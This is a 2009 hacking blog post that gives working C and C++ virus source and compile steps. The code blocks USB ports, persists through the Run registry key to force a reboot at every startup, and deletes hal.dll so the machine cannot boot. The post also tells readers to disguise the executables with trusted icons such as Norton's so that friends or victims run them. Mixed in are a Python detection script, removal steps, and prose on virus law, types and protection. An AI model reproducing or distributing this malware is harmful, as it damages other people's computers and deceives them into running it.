Tuesday, November 24, 2009


A Virus Program to Disable USB Ports

In this post I will show how to create a simple virus that disables (blocks) the USB ports on a computer. As usual I use my favourite C programming language to create this virus. Anyone with a basic knowledge of C should be able to understand how this program works.

Once this virus is executed it will immediately disable all the USB ports on the computer. As a result you will not be able to use your pen drive or any other USB peripheral on that computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries, since I have also given a program to re-enable all the USB ports.

1. Download the USB_Block.rar file on to your computer.

2. It contains the following 4 files.

  • block_usb.c (source code)
  • unblock_usb.c (source code)

3. You need to compile them before you can run them. A step-by-step procedure to compile C programs is given in How to Compile C Programs.

4. Upon compilation of block_usb.c you get block_usb.exe, a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

5. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). You will see that the pen drive is never detected. To re-enable the USB ports, just run unblock_usb.exe (you need to compile unblock_usb.c first). Now insert the pen drive and it should be detected.

6. You can also change the icon of this file to make it look like a legitimate program. For more details on this see How to Change the ICON of an EXE file (this step is optional).

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will be restarted every time the system is booted. This means that the computer becomes inoperable, since it reboots as soon as the desktop is loaded.

For this, the virus needs to be double-clicked only once, and from then onwards it will carry out the rest of the operations by itself. One more thing: none of the antivirus programs detects this as a virus, since I have coded it in C. So if you are familiar with C it is easy to understand the logic behind the code.

Here is the source code.

```c
#include
#include
#include

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst("C:\\windows\\system",&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst("C:\\windows\\system\\sysres.exe",&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst("D:\\windows\\system",&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst("D:\\windows\\system\\sysres.exe",&ffblk,0);
if(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst("E:\\windows\\system",&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst("E:\\windows\\system\\sysres.exe",&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst("F:\\windows\\system",&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst("F:\\windows\\system\\sysres.exe",&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],"rb"); //The virus file opens itself
switch(drive_no)
{
case 1:
target=fopen("C:\\windows\\system\\sysres.exe","wb"); //to place a copy of itself in a remote place
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe"); //put this file into the registry for startup
break;

case 2:
target=fopen("D:\\windows\\system\\sysres.exe","wb");
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe");
break;

case 3:
target=fopen("E:\\windows\\system\\sysres.exe","wb");
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe");
break;

case 4:
target=fopen("F:\\windows\\system\\sysres.exe","wb");
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe");
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system("shutdown -r -t 0"); //if the system is already infected then just give a command to restart
}
```


Compiling The Source Code Into An Executable Virus

1. Download the Source Code Here
2. The downloaded file will be Sysres.C
3. For step-by-step compilation guide, How to compile C Programs.

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear. To test, just double-click the sysres.exe file and restart the system manually. From now on, every time the PC is booted and the desktop is loaded, your PC will restart automatically, again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.

1. Reboot your computer in SAFE MODE.
2. Go to X:\Windows\System (X can be C, D, E or F).
3. You will find a file by the name sysres.exe; delete it.
4. Type regedit in Run. This opens the registry editor. Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

There, on the right side, you will see an entry by the name "sres". Delete this entry. That's it; you have removed this virus successfully.
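The two artifacts the removal steps above rely on (the "sres" value under the HKCU Run key and the dropped X:\Windows\System\sysres.exe) can be checked for from an incident-response script instead of by hand. This is an added example, not code from the post: it triages a constructed sample of `reg query` output for the Run key and looks for the dropped file under a set of drive roots (the post's C: to F:), so it runs offline on any platform. The indicator names and the sample registry text are taken from the post; the helper names are my own.

```python
import ntpath
import os
import re
import tempfile

# Constructed sample of `reg query HKCU\...\Run` output (not captured from
# a real machine). The second value is the entry the post tells you to delete.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    sres        REG_SZ    C:\windows\system\sysres.exe
"""

# One value line of reg query output: <indent><name><spaces><REG_type><spaces><data>
RUN_VALUE_RE = re.compile(r"^\s{2,}(\S+)\s+(REG_\w+)\s+(.*)$")

# Indicators named in the post: the Run value "sres", the dropped file
# "sysres.exe", and the legacy <drive>:\Windows\System folder (not System32).
INDICATOR_VALUE_NAME = "sres"
INDICATOR_FILE_NAME = "sysres.exe"
LEGACY_SYSTEM_DIR_RE = re.compile(r"^[a-z]:\\windows\\system\\", re.IGNORECASE)


def parse_run_entries(reg_query_output):
    """Return (name, reg_type, data) for every value line in reg query output."""
    entries = []
    for line in reg_query_output.splitlines():
        m = RUN_VALUE_RE.match(line)
        if m:
            entries.append((m.group(1), m.group(2), m.group(3).strip()))
    return entries


def executable_path(data):
    """Extract the program path from Run value data, dropping any arguments."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split()[0] if data else ""


def triage_run_entries(reg_query_output):
    """Return [(name, exe_path, [reasons])] for Run entries matching the indicators."""
    flagged = []
    for name, _reg_type, data in parse_run_entries(reg_query_output):
        exe = executable_path(data)
        reasons = []
        if name.lower() == INDICATOR_VALUE_NAME:
            reasons.append("value name is 'sres'")
        if ntpath.basename(exe).lower() == INDICATOR_FILE_NAME:
            reasons.append("program is sysres.exe")
        if LEGACY_SYSTEM_DIR_RE.match(exe):
            reasons.append("program lives in legacy <drive>:\\Windows\\System")
        if reasons:
            flagged.append((name, exe, reasons))
    return flagged


def find_dropped_copies(drive_roots):
    """Check each drive root for windows/system/sysres.exe; return the paths found."""
    hits = []
    for root in drive_roots:
        candidate = os.path.join(root, "windows", "system", INDICATOR_FILE_NAME)
        if os.path.isfile(candidate):
            hits.append(candidate)
    return hits


def demo_drive_root():
    """Build a throwaway directory tree that mimics an infected drive (constructed)."""
    root = tempfile.mkdtemp(prefix="drive_")
    sysdir = os.path.join(root, "windows", "system")
    os.makedirs(sysdir)
    with open(os.path.join(sysdir, INDICATOR_FILE_NAME), "wb") as f:
        f.write(b"placeholder, not the real file")  # inert stand-in
    return root


if __name__ == "__main__":
    for name, exe, reasons in triage_run_entries(SAMPLE_REG_QUERY):
        print(f"suspicious Run value {name!r} -> {exe}: {'; '.join(reasons)}")
    root = demo_drive_root()
    print("dropped copies:", find_dropped_copies([root, root + "_clean"]))
```

On a live Windows host, feed the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` to `triage_run_entries` and the real drive roots to `find_dropped_copies`.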

Logic Behind The Working Of The Virus

If I don't explain the logic (algorithm) behind the working of the virus, this post will be incomplete. So I'll explain the logic in a simplified manner, without going into the technical details of the program. If you have further doubts, please leave a comment.

LOGIC:
1. First the virus finds the root partition (the partition on which Windows is installed).
2. Next it determines whether the virus file has already been copied (already infected) into X:\Windows\System.
3. If not, it places a copy of itself into X:\Windows\System and makes a registry entry to put this virus file into the startup.
4. Otherwise, if the virus is already found in the X:\Windows\System directory (folder), it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double-click the Sysres.exe file. The restarting process will occur from the next boot of the system.

AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)

After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it, since it has a default icon. It is possible to change the icon of this Sysres.exe file into any other icon that is more trusted and looks attractive.

For example, you can change the .exe file's icon into the Norton Antivirus icon itself, so that people seeing this file believe it is Norton Antivirus. Or you can change its icon into the icon of any popular and trusted program, so that people will definitely click on it.

The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .

How To Make A Fake Virus

This is an interesting tutorial in which we will create a fake "virus" which can shut down, restart or log off your PC (it can also show a message and specify the countdown time). This is actually a faster way to turn off your PC, 'cause it doesn't require clicking START > TURN OFF and so on. And you can always do a little mischief by sending it to your friends ;)


1) Create a shortcut (right click on your desktop and go to New -> Shortcut).
2) A window will appear; that is where you type the command.

There are a few variants; this one will shut down the PC.
To log off the computer type shutdown -l -t 300 -c "your message"
To restart the computer type shutdown -r -t 300 -c "your message"
The number after -t is the number of seconds of countdown there will be before shutdown. After -c write your own message, which will come up when the shutdown box pops up.

3) Click Next, Finish.

4) After this an icon will appear on the desktop; when someone clicks it, the shutdown box pops up.


5) How can I stop the system shutdown? Go to Start -> Run, open cmd, type shutdown -a and press ENTER on the keyboard.

Reality of Virus

A computer virus is a program which intentionally makes copies of itself. It may contain some sort of "payload", which can be destructive or non-destructive program code, that is activated and run when certain conditions are fulfilled.

Legality of Viruses

The laws about writing and releasing viruses vary from country to country and state to state. In the US there are both Federal and State laws preventing damage to data and property, and these ensure that virus writers whose viruses infect large numbers of computers pay the penalty. David Smith, writer of the infamous Melissa MACRO virus, has been successfully prosecuted and awaits sentencing, with a possible fine of anything up to $150,000 and up to 10 years in prison.

In the UK the Computer Misuse Act makes it illegal to modify a computer without authorization, and this was successfully used to prosecute the author of the SMEG virus Christopher Pile, AKA the Black Baron, who received a total of 18 months in prison. During sentencing the judge commented that "those who seek to wreak mindless havoc on one of the vital tools of our age cannot expect lenient treatment". Not every country is so active in finding and prosecuting virus writers, however. A Taiwanese university only reprimanded and demoted the author of the highly destructive and costly CIH virus. Even just collecting viruses, passing source code and writing viruses for non-destructive purposes is illegal in some places, and any wannabe virus writer needs to understand the implications of the law, wherever they are based.

From a more hackish viewpoint I can understand the attraction of looking at the theory of virus writing, the appeal of studying virus source code to see how viruses work, the thrill of capturing and disassembling live viruses, and even, to some extent, the pride felt when writing a new virus as "proof of concept". All of this is fine, as it combines a very healthy curiosity coupled with sound technical skills, something that draws respect from hackers the world over. But, and it's a very big "but", the juvenile egotistic idiots who release these viruses "in the wild", often with their handle and the name of their group in it, have crossed the ethical border that distinguishes hacking from crime.

On a more personal note, I resent the amount of time wasted cleaning up networks of PCs after an infection, evaluating anti-virus software, installing anti-virus software and updating signature files - time that could have been put to more productive use, like hacking. Anyone who chooses to write a virus had better be sure that it never escapes, because if it causes major damage and the police break in their door, the authorities are not going to be convinced by any lame argument about "proof of concept".




How does a Virus Work?

Most viruses are written in assembly code for a specific computer and tightly tied to the operating system of the target computer. This enables them to protect themselves while continuing to spread the viral infection. But viruses don't have to be written in assembly language, and the growth of sophisticated programming languages embedded inside large software packages has allowed the spread of so-called "MACRO" viruses, which infect documents rather than programs.

Nearly everyone gets a virus from time to time, especially when they share floppy disks with friends. But if anyone starts downloading hacker tools from that hot new hacking web site, or start using warez from some dodgy ftp server, then they had better make sure that they have adequate anti-virus (A/V) protection. Although millions of computers are infected with viruses every year, the majority of cases are due to a small handful of persistent offenders out of the estimated 8,000 viruses in the wild.

Anti-virus software detects and removes viruses either by looking for a "viral signature", a string of bytes unique to that virus, or by using heuristic rules to look for "viral behaviour" which may indicate a program seeking to infect other files or cause destructive behaviour. The A/V software will have been programmed to understand how the virus detected hides itself, and will "clean" the infected file, boot sector or document thus removing the virus from the system.




Types of Virus

  • A "boot sector" virus occupies the boot sector of a floppy or hard disk and loads itself into memory during the boot-up sequence. Once in memory, it will attempt to infect the boot sector of any floppy disk used in the computer.
  • An "executable load" virus is a type of virus which attaches itself to executable files and runs when the program is started. Once in memory, it will attempt to infect other program files by attaching itself to them.
  • A "polymorphic virus" is a virus which encrypts itself, changing its viral "signature" each time using a "mutation engine" in an attempt to evade detection and destruction.
  • A "MACRO" virus is one which is written in a programming language embedded inside another program, such as a word processor. The commonest program suite targeted by MACRO viruses is the Microsoft Office group of applications, with the "Concept" and "LaRoux" viruses targeting Word and Excel, but any program which hosts a complex embedded macro programming language could be used to write such a virus.

Types of Payload

  • Viruses with non-destructive payloads play tunes, display banner messages or pop-up messages without causing any data loss, but they are a distraction, and they still need to be removed
  • Random destruction, where the virus changes odd bytes on disk or in memory, alters keystrokes at random, or messes around with the display.
  • Heavy destruction - the virus can cause the destruction of hard or floppy disks by low-level format, or data loss by wiping out a PC's File Allocation Table (FAT).
  • A new generation of viruses have a payload of Network Exploitation, use the Internet to copy themselves, and are more like "worms" than viruses. The notorious Melissa virus, which spread to a large number of computers in 1999, worked by infecting Microsoft Word97 documents then using Microsoft Outlook email software to email itself as an attachment to 50 people chosen from the infected user's email address book.

Getting Infected

Here are some of the ways of getting infected by a virus. Good A/V counter-measures start by recognizing the risk of infection from each source and taking appropriate steps in prevention.

  • The commonest cause of infection is shared floppy disks, but archive tapes and CD-ROMs can also be infected.
  • Any form of pirate software or warez, either downloaded from the Internet or BBSs, purchased or swapped with other warez traders.
  • Freeware or shareware software from a bulletin board, sometimes even when it appears to be from a trusted source.
  • Freeware or shareware from sources on the Internet, even when it appears to be from a trusted source.
  • Any form of email attachments, either programs or documents, are now suspect.



Virus Protection

Preventing viruses from attacking your system is a mixture of commonsense reasoning with some down-to-earth practical precautions, mixed with the use of one or more anti-virus packages to routinely check your system for infection. The level of protection you decide upon will depend on how much you would feel the loss of data if you were infected, and how much time you would spend cleaning up after the infection. A business user with many PCs and business-critical data at stake will be prepared to spend far more on A/V protection than the average home user, because the sums at risk are so much greater. Using appropriate anti-virus protection is at least as important in preventing catastrophic data loss as the backups you make routinely. (You *do* make backups, don't you?)

Commonsense Precautions


  • Never use pirate software or warez - not only is it illegal, but you don't know where it's been, or what might be lurking in there.
  • Always scan all freeware and shareware before use, even when it comes from what appears to be a reputable source.
  • Always scan all Internet downloads before installing and running, even when they appear to be from a reliable archive site.
  • Ensure that you scan all floppy disks you are given before use. This includes shared disks, pre-formatted blank disks and even distribution disks with original software on. Write-protect disks when not in use to prevent accidental infection.
  • Never run programs attached to email before scanning, even when you are sure they come from a trusted source. Save them and scan them before running or installing them.
  • Always scan any document attached to email before opening, or save the attachment and turn off macro features in the program you are using before opening it.
  • CD-ROMs and CD-RW disks should be scanned if your software allows it, but you will not be able to disinfect if you find a virus.
  • Make sure that you always have an updated signature file for your A/V package. This will ensure optimal A/V protection with signature-based A/V software.
  • Use more than one A/V package if you can, as there is a tendency for A/V packages to detect some viruses and miss others. Using multiple packages increases your chance of detecting something nasty before the infection spreads.
  • Make sure that you back up your data regularly and that you can restore successfully. Ensure that you have a virus-free boot disk to boot from in case of infection, and that you also have virus-free disks containing any tools or device drivers you need to recover your data and rebuild your system.

Using an Anti-Virus Package

If you haven't got an anti-virus package already, then you should. There are many around, both free and commercial. Try F-Prot if you need a free virus package, or get hold of free evaluation copies of commercial products such as Symantec's Norton Anti-Virus, McAfee's VirusScan, or ThunderByte and then buy the one you prefer. If you are protecting corporate data, you need to look at some of the disk control mechanisms available such as Reflex Magnetic's DiskNet, and also scan incoming email using a product such as MimeSweeper. There are many alternative products on the market, and you need to assess your degree of risk before evaluating the products to find one that suits you.

Once you have your anti-virus package, make sure that your machine is virus-free *before* installing the package, and then make sure that the signature file is always up to date. Some packages will automatically attach to the Internet at periodic intervals to download the latest signature file, but if you have read this far in the book you might have your own ideas about the wisdom of that, and would prefer to download the signature file yourself.




Writing Viruses

This section deals with writing viruses, but the reader isn't going to find a general tutorial here, nor are there any great tips on writing a "killer" virus. As a hacker I don't condone the writing or spreading of viruses, but I have respect for the knowledge, technical skills and level of coding ability needed. What I hope is that by the time anyone who tries to code viruses gets to be *really* good at it, they will have realized that there are more technically challenging problems outside the area of virus development that are both more socially acceptable and better financially rewarded.

Assembling the Tools

If anyone wants to learn how to write a virus, they had better start by "assembling", pun intended, their tools. Here is a list of things someone will need to begin writing viruses:

  • A computer (*doh*), because it is hard to write programs without one!
  • A programming language of some kind, most probably assembly language, not just because viruses are written mostly in assembly language, but also because the novice virus writer will find most source code and tutorials will assume they are using assembly language.
  • A list of the opcodes or assembly mnemonics of the processor which are being targeted. Don't assume that, just because all the books of programming list 126 opcodes for a chip, that means there *are* just 126 opcodes. Some chips have "undocumented" opcodes that don't work right or have weird side effects. The venerable Motorola 6502 chip used in early Apple computers had an undocumented opcode whose mnemonic was HCF - Halt and Catch Fire - because it hosed the CPU.
  • A disassembler which will turn machine code into human-readable assembly language mnemonics. This will enable the novice virus writer to turn any live viruses they capture back into a computer program that they can read and understand.
  • A decent machine code debugger. SoftIce seems to be the favourite for PCs, but it depends on the platform that the virus is being written for.
  • Large and copious amounts of anti-virus software, both to protect themselves and to examine for clues on how to evade detection.

In addition to the basic tools a wannabe virus writer might need to acquire some of the following from the Internet.

Virus Source Code

Anyone can find virus source code in assembly or other languages very easily on the Internet. Once they have the source code, they can read it and understand how that virus works, or can re-assemble it and get a working virus. That's the theory, but a lot of the so-called virus "source" code kicking around the web isn't, and telling the difference between the two isn't easy unless the novice virus writer is already an expert in assembly language. For example, look at this snippet which purports to be from the STONED virus - the part that checks for infection and then infects the computer if not already infected.

```asm
PUSH CS
POP DS
MOV SI,200H
MOV DI,0
LODSW
CMP AX,[DI]
JNZ HIDEHD ;Hide real boot sector in hard drive.
LODSW
CMP AX,[DI+2]
JNZ HIDEHD ;Hide real boot sector in hard drive.
```

Table 10.1: Assembly language fragment of STONED virus which would infect the hard drive of a computer when run


It looks really impressive, doesn't it? Reading through the assembly source code of the STONED virus, which took me less than five minutes to find on the Internet, it looked *real* enough to me. But to someone who's not a full-time assembly language hacker, the code could have been spurious nonsense, designed to send wannabe virus writers down a blind alley. How am I going to find out whether this is real source code or not? The only way of being sure is to feed the assembly language code into an assembler and turn it into an executable binary of machine code. Once anyone has the binary, they can either compare it with a virus from the "wild" or run it and see if it infects their disks.

Virus Writing Tutorials

There are a lot of virus writing tutorials on the Internet, and anyone learning about viruses really wants to find a tutorial that deals with the platform they are coding for, as any example code can be used to get them started. Otherwise, tutorials in any other languages are good for giving a novice virus writer new ideas and concepts if they can follow them.

Some of the tutorials deal with basic concepts, such as the Over Writing virus, which reproduces itself by overwriting the first parts of a program with itself, and carries a destructive payload that kicks in the first time the program is run. Other tutorials deal in depth with stealth viruses which move to escape detection, armoured viruses which have been specifically designed to evade detection by some of the most popular anti-virus software, and polymorphic viruses that use self-encryption on each new generation to prevent their viral signature being detected.

Virus Creation Packages and Mutation Engines

All software writers use tools, and virus writers are no exception. The two most popular tools are "virus creation packages" and "polymorphic mutation engines". These tools are written by the active virus-writing community, and have only one purpose: to enable writers to code viruses quickly, easily and with advanced capabilities.

Polymorphic Mutation Engines

A polymorphic mutation engine is computer code that allows a virus writer to encrypt viruses to prevent them showing a viral signature. The most famous of these is the Mutation Engine written by the Bulgarian Dark Avenger, but virus writers could also run into TridenT Polymorphic Engine, Visible Mutation Engine and many others. Most of these packages are program modules that can be included in other programs to give them the ability to produce polymorphic viruses. By using these packages and including the code into viruses they are writing, novice writers can give even very simple viruses polymorphic capability, enabling them to escape detection.

Virus Creation Packages

Some virus writers have been clever enough to write "virus creation packages" which can generate virus code for users who can't write their own. One such, the sophisticated Virus Creation Lab, offers a full menu-driven virus creation kit, but others such as Virus Construction Set only offer the user a chance to create a pre-canned virus with their own message in it. Viruses that come from creation packages like these will rarely be as sophisticated as viruses written by hand, because virus writing is advancing so quickly that not all virus types can ever be included in a single package. The packages might be of some use to a novice virus writer who wishes to study the code produced, but real virus writers will still prefer to cut their code the old way, and see the creation package user as a script kiddy capable only of running software other smarter hackers have written.

Once again, any systems administrator should always keep an eye out for any of the tools used by virus writers in case they should appear on the systems they administer. Systems administrators should be aware of activity going on on their systems so that they can spot virus source code, tutorials or virus construction tools before the novice virus writer has got very far. If a systems administrator finds any of these items on their servers, then a little chat with the user owning those tools would be helpful in determining whether they were present due to natural curiosity or any malicious intent.




The Virus Community

Like every part of the computer community, the virus writers have their own community of mailing and discussion lists, web sites and BBSs. The virus writing community is more hidden and covert than most hacking communities because virus writers have more to lose than most hackers, so what anyone will find on the Internet is just the tip of the iceberg, with 90 per cent of virus writing buried deep underground for fear of exposure and prosecution.

Virus groups such as Phalken/Skism, Kefrens, Team Necrosis and phVX write tutorials and ezines, trade viruses, source code, tools, and make them all available on ftp and web sites for anyone with an interest in virus writing to download. Some of the ezines for the virus-writing community include 40hex magazine, Infected Voice, 29A, * magazine and Crypt Newsletter. If anyone wants to get accepted into the virus community, they must make sure they can code really well and then read the section in the next chapter about getting into the warez community, but trade viruses instead of warez. Hopefully by the time they've learnt to code well enough, they'll have become more interested in something more technically challenging and useful than writing viruses.

::Virus Maker::

This incredible Virus Maker is 100% free and I love it.

This Program is made by D1sr3p41r3ds

I want to share it with you all!! If i got it wrong , Contact ME!

This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.

The Original Code:

```cpp
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
```

A more advanced version of this virus, which replaces the hard-coded C:\Windows with a variable so that the path cannot be wrong. Here it is:

```cpp
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
```

The second version would be more useful when you do not know the victim's default drive. It might be drive N: for all you know.
